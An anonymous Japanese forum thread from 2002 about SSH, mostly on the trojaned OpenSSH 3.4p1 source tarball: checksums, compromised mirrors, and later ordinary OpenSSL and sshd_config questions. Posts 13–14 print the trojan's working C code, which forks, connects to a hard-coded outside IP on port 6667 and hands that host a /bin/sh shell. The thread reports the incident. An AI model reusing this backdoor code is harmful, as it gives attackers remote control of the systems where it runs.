SSH その2

1 名前：名無しさん＠Ｅｍａｃｓ 投稿日：02/08/01 08:23: SSH に関する情報を扱います。
前スレ: http://pc.2ch.net/test/read.cgi/unix/976497035/
2 名前：名無しさん＠Ｅｍａｃｓ 投稿日：02/08/01 08:24: 関連リンク集(前スレより)
本家SSH: http://www.ssh.com/
(日本語) http://www.ipsec.co.jp/products/ssh/
OpenSSH: http://www.openssh.com/ja/
OpenSSH 情報: http://www.unixuser.org/~haruyama/security/openssh/
OpenSSH マニュアル: http://www.unixuser.org/~euske/doc/openssh/jman/
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty/
(PuTTY日本語版): http://hp.vector.co.jp/authors/VA024651/
(PuTTYスレ) http://pc.2ch.net/test/read.cgi/unix/1014702733/l50
TTSSH: http://www.zip.com.au/~roca/ttssh.html
MacSSH: http://www.macssh.com/
WideのSSH解説: http://www.soi.wide.ad.jp/class/20000009/slides/12/
IETF SecSH Protocol: http://www.ietf.org/html.charters/secsh-charter.html
SSH FAQ: http://www-vacia.media.is.tohoku.ac.jp/~s-yamane/FAQ/ssh/ssh-faq.html
PortForwarder: http://portforwarder.nttsoft.net/JP/
VNC on SSH: http://www.uk.research.att.com/vnc/faq.html
Tramp: http://ls6-www.informatik.uni-dortmund.de/~grossjoh/emacs/tramp_ja.html
おまけ・Theoのキチガイぶり: http://pc.2ch.net/test/read.cgi/unix/1023635938/546-550
3 名前：参メール：sage 投稿日：02/08/01 12:44: ついでにコレも：
(TTSSH日本語版): http://www.sakurachan.org/soft/teraterm-j/ttssh/
4 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/01 17:22: portable版3.4p1にトロイの木馬ですか。。((;ﾟдﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
5 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/01 17:27: >>4
某サーバの6667につないで/bin/shしてるよーな、そんな感じ。
＜トロイ
6 名前：通行人さん＠無名タレント メール：sage 投稿日：02/08/01 17:33: >>4
詳細＆ソースぷりーず
7 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/01 17:36: >>6
だいじょぶなやつ
837668 bytes
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

ダメなやつ
840574 bytes
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
8 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 17:37: せっかくだからageときましょ
9 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/01 17:41: >>7
ダメなやつってopenssh.comが配布してたの?
それともmirrorのふりしてニセモノつかませてたサイトがあったとか?
10 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 17:42: >>9
さっき、マスターサイトから取得したら、ダメファイルだたよ…。
おそらく出回ってるミラーも、現在は危険でしょう。
11 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 17:53: いつごろからダメファイル設置されていたんでしょう？
12 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 17:53: http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
13 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 17:57: 参考までに、ビルド時に生成されて実行されるコード:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int s;
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";
void sig(int sig){
close(s);
sleep(3600);
longjmp(env, 0);
} int main() {
int x;
char c, *a[2];
struct sockaddr_in sa;
struct sigaction act;
switch (fork()) {
case 0:
break;
default:
exit(0);
} close(0);
close(1);
close(2);
memset(&act, 0, sizeof(act));
act.sa_handler = sig;
sigaction(SIGALRM, &act, NULL);
14 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 17:57: do {
setjmp(env);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1))
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("203.62.158.32");
alarm(10);
if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1))
exit(1);
if ((x = read(s, &c, 1)) == (-1)) {
exit(1);
} else if (x == 1) {
switch (c) {
case 'A':
exit(0);
case 'D':
alarm(0);
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
a[0] = i_val;
a[1] = NULL;
execve(a[0], a, NULL);
break;
case 'M':
alarm(0);
sig(0);
break;
default:
}
} else {
exit(0);
}
} while (1);
}
15 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 17:57: i_val はすなわち "/bin/sh" ね。
16 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 18:45: ftp.u-aizu.ac.jp でダメファイルを確保しますた。
Ring はどうよ?
17 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/01 19:15: ring は OpenSSH のミラーしてないみたい。
うちでは /usr/ports/distfiles/ にだいじょうぶなやつがあったんで、
ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ を調べたが、
ftp> dir openssh*
150 Opening ASCII mode data connection for '/bin/ls'.
-rw-r--r-- 1 1006 1006 330665 May 1 2001 openssh-2.9.tgz
-rw-r--r-- 1 1006 1006 662590 Jun 17 2001 openssh-2.9p2.tar.gz
-rw-r--r-- 1 1006 1006 363849 Nov 14 2001 openssh-3.0.1.tgz
-rw-r--r-- 1 1006 1006 780980 Nov 15 2001 openssh-3.0.1p1.tar.gz
-rw-r--r-- 1 1006 1006 364230 Mar 29 04:51 openssh-3.0.2.tgz
-rw-r--r-- 1 1006 1006 781092 Mar 29 04:51 openssh-3.0.2p1.tar.gz
-rw-r--r-- 1 1006 1006 9071 May 10 06:47 openssh-3.1-adv.token.patch
-rw-r--r-- 1 1006 1006 367903 Mar 6 00:43 openssh-3.1.tgz
-rw-r--r-- 1 1006 1006 9203 May 10 06:47 openssh-3.1p1-adv.token.patch
-rw-r--r-- 1 1006 1006 803104 Mar 7 02:41 openssh-3.1p1.tar.gz
226 Transfer complete.
残念、まだミラーされてなかった模様。
18 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 19:30: ftp://ftp.ring.gr.jp/pub/OpenBSD/OpenSSH/portable/

ここのは正常だったよ。
19 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/01 19:31: ring でも /pub/OpenBSD/OpenSSH/portable/ にあると思いますが、
毒入りかどうかは未確認(たぶんまだかな)。
すでに毒がまわっている OpenBSD のミラーもいくつかあるようです。
20 名前：16 メール：sage 投稿日：02/08/01 19:35: ftp.u-aizu.ac.jp には大丈夫な奴とダメな奴の
両方があるみたいだね。ダメファイルは多分

/pub/net/security/ssh/openssh/portable

の方。
21 名前：名無しさん＠カラアゲうまうま メール：sage 投稿日：02/08/01 19:42: >>12
これはOpenBSDでコンパイルするときがヤバイってこと?
22 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/01 19:46: see http://www.mavetju.org/weblog/weblog.php
23 名前：名無さん＠腹へった メール：sage 投稿日：02/08/01 20:26: >>19
いくつかの Ring サーバで /pub/OpenBSD/OpenSSH/portable のを
調べたけど大丈夫だった
24 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/01 20:37: Ring サーバって OpenBSD 自体が無いところもいくつかあるね。
近い ring.ocn.ad.jp には無かったよ。(´･ω･`)ｼｮﾎﾞｰﾝ
25 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/01 20:56: bf-test.cそのものは単にソース吐いてるだけか...
26 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 01:00: で，この原因はftp.openbsd.orgがcrackされたということなの？
27 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 01:13: >>26
実は Theo たんが…
28 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 01:19: おまいらportable版なぞ使わずOpenBSDを使え! っすか? (((；ﾟДﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
29 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 01:24: >>26

たぶんそう。
てことは、ssh だけじゃなくて、OpenBSD 本体の方も、書換えが
行なわれてないか調べる必要があるわけだが...
30 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 01:35: こういう時って、ftp.openbsd.orgの中身は全て信頼できないものと見なさな
いと危険だよね。
CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。
31 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 03:05: misc@に流れたAdvisoryのapplication/pgp-signatureがdemimeされていてちょっとワラタ
32 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 04:18: > CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。

その筈なんだが、もし ftp.openbsd.org で root も盗られていて、しかも
ftp.openbsd.org と cvs.openbsd.org で共通にアカウントを持つ人間がいた
りすると、結構やばい。
この前の monkey.org の件でも、同じ心配があるな。
33 名前：. メール：sage 投稿日：02/08/02 10:38: OpenBSDは、どうなってしまうんだろう。。。
34 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 11:04: 別にどうもならん。
35 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 12:12: >>33
セキュリティが唯一の取り柄のOSだったのに、
マトモな人なら使うの止めるだろうなぁ。
36 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 12:22: 誰かまぬけな俺に教えてくれ。どうして ftp.openbsd.orgは > 220 merlin FTP server (SunOS 4.1) ready. なのですか? ひょとして、トロイ埋め込まれたのはOpenBSDのせいじゃないんじゃ?
37 名前：36 メール：sage 投稿日：02/08/02 12:23: あれ?
改行が通らねえ…見苦しくてスマソ。
38 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 12:31: >>36
http://www.openbsd.org/faq/faq8.html#wwwsolaris
39 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 15:25: いよいよdjbsshの出番d(略
40 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 15:32: Theoがなにも考えずに3.4にあげろっていってたのはこのためか。
41 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/02 15:48: 危険なのでage
42 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 16:58: 　　　　　　　　　Theoワッショイ！！
　　　　　＼＼　 Theoワッショイ！！　／／
　+　　　+　＼＼　Theoワッショイ！！／+
　　　　　　　　　S　　　　S　　　　H　　　　　+
.　　　+　　／□＼　　／□＼　／□＼　　+
　　　　　　（　´∀｀∩（´∀｀∩）（　´ー｀）
　+　　（(　（つ　　　ノ（つ　　丿（つ　　つ　)）　　+
　　　　　　ヽ　（　ノ　（　ヽノ　　）　）　）
　　　　　　　（＿）し'　し（＿）　（＿）＿）
43 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/02 17:51: 毒を仕込んだの、実はTheo
44 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/02 19:14: >39 マヂであったら欲しい。
45 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/02 19:16: 問題のweb.snsonline.net って、何奴？
46 名前：名無しさん＠カラアゲうまうま メール：sage 投稿日：02/08/02 19:32: 単なるホスティングサービスだろう。
今は動いてないようだが、たぶん不要なircdが動いてるのを利用されたんだろう。
47 名前：名無しさん＠サンマうまうま メール：sage 投稿日：02/08/02 22:17: Theo尊師祭りのところすみません。
OpenSSLを上げたら
debug1: ssh_dss_verify: signature incorrect
と出てpublickey認証が通らなくなっちゃったんですが、何かご存知の方おしえてください。
よろしくおながいします。
48 名前：名無しさん＠お酒のみすぎ メール：sage 投稿日：02/08/03 01:10: 自己レスすんません、gcc-2.95.2.1で-funroll-all-loopsつけるとダメだったみたいです、 make testも通りませんでした。-funroll-all-loopsを外したら通りました。
49 名前：名無しさん＠カラアゲまうまう 投稿日：02/08/03 01:10: cvs.openbsd.org が疑われているようです…
50 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/03 16:44: げげ～。cvs リポジトリ全体が信頼できないとなると、OpenSSH だけじゃなく
OpenBSD 全体がかな～りやばいことにならんか?
51 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/03 21:30: もうだめぽ
52 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/04 14:41: OpenSSHがんばってくりっちょ！
53 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/04 15:16: Solaris9についてる
Sun SSHってどーよ？
一応OpenSSHベースらしいが、
どのくらい違うのでしょう。
54 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/04 21:11: O　p　e　n　B　S　D　落　日　の　日　迫　る！　！　！
55 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/04 21:13: >>53
俺も普段 Solaris 使ってないから分からないけど、
心配なら本家から porting されてる OpenSSH 使えば?
56 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/04 22:37: >>54
マジだとしてマジレスするとちょっと残念だな。
57 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/04 23:53: 今回の件は、べつにOpenBSD自体の脆弱性が呈されたわけでもなんでもないでしょう。

ところで前から気になってたんだけど、おなじディレクトリに .md5置いとくのって、
あんまり意味ないよね。(それとも、crack対策じゃなくて、ファイルが壊れてないかどうかの検証用なのかな？)
58 名前：初期不良 メール：sage 投稿日：02/08/05 01:29: ftp.openbsd.org anonymous ログインできないでつ...
59 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/05 07:43: >>57
OpenBSD「プロジェクト」の脆弱性ははっきりしたのは確か
60 名前：57 メール：sage 投稿日：02/08/05 07:51: >>59
そういう考え方もあったかー。

でも、問題のsunsiteなんとか切れば、というか使うのやめたらそれで
おしまいな話なんじゃないの？
61 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/05 12:08: >>60
monkey.org の方は openbsd 使ってたんじゃないの?
62 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/05 20:23: >>61
それって単にミラーリングで伝播しただけってのとは違うの？

(といっても、monkey.orgってのがどんな代物かも知らないのですが...詳細きぼん。)
63 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/05 22:05: > それって単にミラーリングで伝播しただけってのとは違うの？

sshの件とは関係ない。

> 詳細きぼん

bugtraq と monkey.org を指定して google で探すと、最初に出てくるぞ。
monkey.org は、OpenBSD の committer がやっているサイトね。
64 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/05 23:47: しまった、保存する前に前スレがdat落ちしてしまったよ…ウワァァン
誰か前スレ保存している方いらっしゃいませんか？
65 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/06 01:26: 途中までなら
http://www.google.co.jp/search?q=cache:hihesdfKKgsC:pc.2ch.net/test/read.cgi/unix/976497035/+&hl=ja&ie=UTF-8
66 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/06 03:22: http://www.42ch.net/UploaderSmall/source/1028571690.dat
bzip2でし
67 名前：64 メール：sage 投稿日：02/08/06 05:47: >>65
ありがとうございます。…しかし、見たい部分はさらに後の方にあるようです…

>>66
おおおおおー！拡張子をbz2に変更して解凍したら見ることができました。
# 「不完全な」HTMLファイルといったｶﾝｼﾞですな
68 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/06 06:30: >67
http://www.skipup.com/~niwatori/index3.htm#dat
69 名前：名無しさん＠Ｅｍａｃｓ メール：sage 投稿日：02/08/06 22:44: いまさらだけど、

http://130.158.36.68/~pooh/ssh.html
70 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/07 00:24: で、春山さんのトコに過去ログHTML置いてくれると嬉かったり…。
71 名前：64=67 メール：sage 投稿日：02/08/07 03:31: >>68
えぇ、知っております。しかしID登録する気はないので(苦笑)、>>64を書いたので
した。

>>70
同意です！！
72 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/07 08:03: 読めないdat落ちスレのミラー作ります
http://ton.2ch.net/test/read.cgi/gline/1026576001/
73 名前：春山征吾 ◆9Ggg6xsM メール：sage 投稿日：02/08/07 12:23: http://www.unixuser.org/%7Eharuyama/security/openssh/dat/pc.2ch.net_80__unix_dat_976497035.html
に
http://www.moonwolf.com/ruby/のdat2html.rbで変換したものを置きました。
74 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/07 21:41: OpenSSH は theo と OpenBSD とともに入滅の時を待っています。
75 名前：名無しさん＠カラアゲうまうま メール：sage 投稿日：02/08/07 22:30: OpenSSHが死んだらつぎはFreSSHかねえ
76 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/07 22:55: >>75
意味わかんね。
77 名前：70 メール：sage 投稿日：02/08/07 23:10: >>73
春山さん、ありがとうございます!!(m__m)
78 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/07 23:59: >>76
ttp://www.fressh.org
79 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/08 02:57: >>78
あ、そういうのがあるんね。無知でｽﾏｿ。
80 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 05:09: >>57
md5って壊れてないかどうかのチェック用で、
crack対策はPGPやGPGの署名を使えばいいんじゃない?
81 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 11:26: >>80
まあパッケージ一つ一つを署名するのは面倒な作業だと思うけど、
sshとかのセキュリティ関係のプログラムだけ署名するなら現実的ですね。
今度は「この署名は正しいようだが、これを署名した人間は本当に
信用出来るのか？」という問題が出てくるから、それなりの人物の署名でないと
意味が無いので…
82 名前：login:Penguin メール：login:Penguin 投稿日：02/08/12 11:39: opensslが0.9.6gになってるんだけど、ちゃんとopensshもmakeしなおしましたか？
83 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 13:23: >>82
し直さないとダメなんでしょうか？　ダメなんですよね、きっと。
その場合って、openssh を make distclean とかする必要あります？
84 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/12 13:25: >>82
漏れは openssl を shared でコンパイルしてるから、ssh は
再起動しただけですが何か？
ssh -V
OpenSSH_3.4p1, SSH protocols 1.5/2.0, OpenSSL 0x0090607f
85 名前：login:Penguin メール：login:Penguin 投稿日：02/08/12 15:40: ldd /usr/sbin/sshd
してみたら、たしかにsharedでリンクされてるんだけど、
libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x280d0000)
これで,
ls -al /usr/lib/libcrypto.so.3
で見てみると古いライブラリなんですよね。
あたらしいやつは
/usr/lib/libcrypto.so.2
みたい。やっぱりmakeしなおしですか？
一応再起動してみたけど、
/usr/lib/libcrypto.so.3
にリンクされてたもんで・・・
86 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 16:11: >>85
犬板とクロスポストかよおめでてえな
87 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 16:56: >>85
libcrypto.so.3 がライブラリの実体なんですか？
別のファイルのシンボリックリンクだったりしません？
私の所では、libcrypto.so.0.9.5a のリンクで、
そちらのタイムスタンプはアップデート後のものになってました。
88 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 17:30: libcrypto.so.3 はライブラリの実体でした。
libcrypto.soはlibcrypto.so.2にシンボリックリンクになってます。
きっとopensslをmakeする前はlibcrypto.soはlibcrypto.so.3にシンボリックリンクされてたんだと思います。

OpenSSHをmakeするときに、libcrypto.soにリンクしてくれればいいのに。。。
89 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 21:47: elfのmajorの話と混同してないか？
90 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 21:59: openssl 0.9.6c を make install している最中に sshd が落ちた…。
openssl の Makefile は libcrypto.so.0.9.6 を上書きしちまうのか?
また 0.9.6e でも同じことをせんように気をつけねば。
91 名前：sage 投稿日：02/08/12 22:52: 0.9.6e じゃなくて、0.9.6gにしとけ >> 90
92 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 23:00: 堅い方法だと、singleに落としてmake installするしかないのかな
93 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/12 23:05: このへんの正しいインストール手順きぼんぬ。
94 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/12 23:05: >>90 上書きしてくれなきゃバージョンアップの意味ないのでわ？ちなみに、shared を置き換えて daemon が落ちるのはごく普通。
95 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/13 00:47: FreeBSDだとlibcrypto.so.2　で、Solarisだとlibcrypto.so.0.9.6 になってるなぜ？
96 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/13 01:40: >>92
network 経由じゃそれをやるのは不可能に近いからねぇ。それをやろうとすると
Terminal server を用意して…とかいうことになる。

>>94
一番悪いのは version number の持つ意味をなかば無視して 0.9.6 のまま固定
しちゃっていることだけど、Makefile のほうも古い library を mv して
mv libcrypt.so.0.9.6 libcrypt.so.0.9.6-old してから新規 library を
libcrypt.so.0.9.6 として install してくれれば、とりあえず被害はある程度は
収まる。
97 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/13 03:12: openssl の config や Makefile ってかなり腐っているな…。
config --prefix=/usr/local --openssldir=/usr/local/ssl ってやっても
意図通りに install されないんで Makefile 見たら萎えた。

とっとと autoconf に移行しろよ…。
98 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/13 03:39: >>97
まずあり得ないと思われ

autoconfってGPL/LGPL縛りあるんでない？
99 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/13 03:50: >>98
configureやconfig.*のコメント見てみ。縛りは無いYO。
100 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/13 12:23: 　┌─────────┐
　│ 　　　　　　　　　　　　.|
　│　 100get　　│
　│ 　　　　　　　　　　　　.|
　└―――──――――┘
　　　　　　ヽ(´ー｀)ﾉ
　　　　　　 (　へ)
　　　　　　く
101 名前：名無しさん＠Ｅｍａｃｓ 投稿日：02/08/13 21:57: FreeBSDを今日のSTABLEにしたらKeyChainが動かなくなってしまいった。
一週間前にSTABLEでは大丈夫だった。
portsからインストールした1.9
起動時にこんなエラーが。

/usr/local/bin/keychain: 244: Syntax error: "||" unexpected

OpenSSL関係かな？
102 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/13 22:01: >>101
OpenSSHそのものとは無関係

/bin/shでの文法の解釈が微妙に変わった副作用だな

詳しくはこのへん参照
http://pc.2ch.net/test/read.cgi/unix/1028052350/211
103 名前：101 メール：sage 投稿日：02/08/13 22:29: >>102
そうですか。
KeyChain側で対応すべき問題なのかな？
104 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/14 03:06: >>101
http://www.freebsd.org/cgi/query-pr.cgi?pr=40386
105 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/08/14 10:20: ♯お約束？

>>103
> KeyChain側で対応すべき問題なのかな？

だからどうして keychain なぞを使わにゃならんのかと小一時間…
106 名前：101 メール：sage 投稿日：02/08/14 11:47: >>105
自分が自宅で使うマシンで、keychainが便利だから。
107 名前：104 メール：sage 投稿日：02/08/15 03:10: >>101は
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=2169031+0+archive/2002/cvs-all/20020811.cvs-all
まで辿り着けたのでせうか。
108 名前：FreeBSD質問スレの206=211 メール：sage 投稿日：02/08/15 03:41: >>107
あら、/bin/sh側に修正入ったのね。
17日にMFCかかったらCVSupするか…。
109 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/16 06:22: freebsd4.5Rを使ってますがsshd_configで
AllowUsers user1 user2
特定のユーザであり特定のip addrからのみssh接続許可したいのですが
どうすれば良いのでしょうか？
110 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/16 09:22: >109
tcpd
111 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/08/16 10:11: >>109
> freebsd4.5Rを使ってますがsshd_configで
> AllowUsers user1 user2
> 特定のユーザであり特定のip addrからのみssh接続許可したいのですが
> どうすれば良いのでしょうか？

AllowUsers を知っていながらこういう質問が出るってことは OpenSSH
2.9p1 辺り？

3.Xp に上げれば

AllowUsers user1@ip1 user2@ip2

で逝けるだろう。
112 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/16 17:09: >>109
PasswordAuthentication no にして、鍵認証だけを
許可するって方法もあるです。AllowUsers の方が
楽だけど。
113 名前：109ではないけど メール：sage 投稿日：02/08/16 17:35: >>111
初めて知ったっ！ありがとうございます！

> 3.Xp に上げれば
>
> AllowUsers user1@ip1 user2@ip2
>
> で逝けるだろう。

うーん、アナウンスメールでの変更内容見てもこれに関する記述はなかった
なぁ…。

ChangeLog見てみるかな…。
114 名前：113 メール：sage 投稿日：02/08/16 17:40: あー、ちなみに、3.0.2p1にはその機能はなかったですね（3.0.2までのChangeLogは
読んだ）。ということは3.1以降ですね。

量が多くて大変だが見てみっか！ゴルァァァァ
115 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/08/16 20:39: >>114
> あー、ちなみに、3.0.2p1にはその機能はなかったですね（3.0.2までのChangeLogは
> 読んだ）。ということは3.1以降ですね。

あー、そーなんだー。手元には 2.9 と 3.1 以降しかなかったんで気
付かず 3.X ってかいちまったっす。

> 量が多くて大変だが見てみっか！ゴルァァァァ

ChangeLog より、直截的に auth.c の allowd_user() 辺りを 2.9 と
3.[1-4] とで見比べてみる方が早道。
116 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/08/16 20:44: > ChangeLog より、直截的に auth.c の allowd_user() 辺りを 2.9 と

もちろん、

< ChangeLog より、直截的に auth.c の allowed_user() 辺りを 2.9 と

ね。

♯いかん、最近この手のミスが多いな。

あと match.c と。
117 名前：113=114 メール：sage 投稿日：02/08/17 00:02: レスどうもです。

>>115
>>116
　アドバイスありがとうございます。見てみます。

# 最初>>116でおっしゃっている意味がさっぱり分からなかったんですが、今
# もう一回見たらやっと分かった…allowd_user()ではなく、allow*e*d_user()
# なわけですね。

ちなみに、3.0.2p1のマニュアルにはこういった記述はないですが、3.4p1のマニュアル
（日本語訳はhttp://www.unixuser.org/~euske/doc/openssh/jman/sshd_config.html参照）
にはバッチリ書かれてますね。
118 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/17 04:38: opensshを最新にしたらps ax
sshd: user [priv] (sshd)
sshd: user@ttyp0 (sshd)
でこうなるんですがこれで正常なんですよね？
119 名前：113=114 メール：sage 投稿日：02/08/17 10:14: ChangeLogをざっと眺めてみたけど、これだ!というのが見つからなかったです…。
それらしきものは以下の部分かなぁ…。

20020304
　- OpenBSD CVS Sync
　　 - stevesk@cvs.openbsd.org 2002/02/28 19:36:28
　　 [auth.c match.c match.h]
　　 delay hostname lookup until we see a ``@'' in DenyUsers and AllowUsers
　　 for sshd -u0; ok markus@
　　 - stevesk@cvs.openbsd.org 2002/02/28 20:36:42
　　 [sshd.8]
　　 DenyUsers allows user@host pattern also

で、3.1p1のsshd.8を見てみたら件のUSER@HOSTに関する説明が追加されているのを
確認しますた。sshd.8のAllowUsersオプションに関する部分より：
all users. If the pattern takes the form USER@HOST
then USER and HOST are separately checked, restricting
logins to particular users from particular hosts.
120 名前：113=114=119 メール：sage 投稿日：02/08/17 11:13: さらに、>>115と>>116で述べられていたソースコードを見てみますた…ざっと見
たところ、最終的にはmatch.cのmatch_user()関数に行き着くようですね。で、この
関数は2.9p2→2.9.9p2で追加されたようです。
　2.9p2: RCSID("$OpenBSD: match.c,v 1.12 2001/03/10 17:51:04 markus Exp $");
2.9.9p2: RCSID("$OpenBSD: match.c,v 1.14 2001/06/27 04:48:53 markus Exp $");

…で、2.9.9p2の配布ファイルのChangeLogを見てみると、該当個所ハケーン：
20010704
　- OpenBSD CVS Sync
　　- markus@cvs.openbsd.org 2001/06/27 04:48:53
　　 [auth.c match.c sshd.8]
　　 tridge@samba.org

んなの分かるかヴォケェェェ！！！！！！きちんと説明書けやゴルァァァ！
121 名前：113=114=119=120 メール：sage 投稿日：02/08/17 11:36: 結論：
機能そのものは2.9p2→2.9.9p2で追加され、マニュアルでの記述は3.0.2p1→3.1p1で
追加された。
122 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/08/17 17:19: >>120
> さらに、>>115と>>116で述べられていたソースコードを見てみますた…

乙渇れー。

> んなの分かるかヴォケェェェ！！！！！！きちんと説明書けやゴルァァァ！

つーこって、“Use the source, Luke”なんだ罠、やっぱ。
123 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/08/17 17:27: >>118
ttp://www.unixuser.org/~haruyama/security/openssh/README.privsep_nihongo.txt
124 名前：120=121 メール：sage 投稿日：02/08/18 07:50: >>122
いちおう、自分なりにやってみたわけですが、分析結果は正しいですよね？>>122さ
んをはじめ、他の人のアドバイスきぼんぬ。

あと、話の腰を折る気は全くないんですが（本当ですっっ）、“Use the source, Luke”
って何なんですか？元ネタはopenssh-unix-dev？
125 名前：名無しさん＠カラアゲうまうま メール：sage 投稿日：02/08/18 07:57: s/source/force/
Luke = Skywalker
126 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/18 10:07: May the source be with you.
127 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/08/18 10:47: >>124
> いちおう、自分なりにやってみたわけですが、分析結果は正しいですよね？>>122さ
> んをはじめ、他の人のアドバイスきぼんぬ。

正しいっす。

たしかに 2.9.9 から allowed_users() が match_pattern() を直接
